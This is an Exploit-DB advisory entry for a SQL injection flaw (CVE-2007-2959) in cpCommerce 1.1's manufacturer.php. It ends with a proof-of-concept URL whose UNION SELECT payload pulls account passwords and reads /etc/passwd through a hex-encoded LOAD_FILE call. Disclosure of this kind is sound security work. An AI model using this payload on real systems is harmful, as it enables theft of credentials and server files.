CPCommerce 1.1 Manufacturer.PHP SQL Injection Vulnerability

2007-05-29T00:00:00
ID EDB-ID:30101
Type exploitdb
Reporter laurent gaffie
Modified 2007-05-29T00:00:00

Description

CPCommerce 1.1 Manufacturer.PHP SQL Injection Vulnerability. CVE-2007-2959. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/24223/info

cpCommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

cpCommerce 1.1.0 is reported vulnerable; other versions may also be affected. 

http://www.example.com/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/*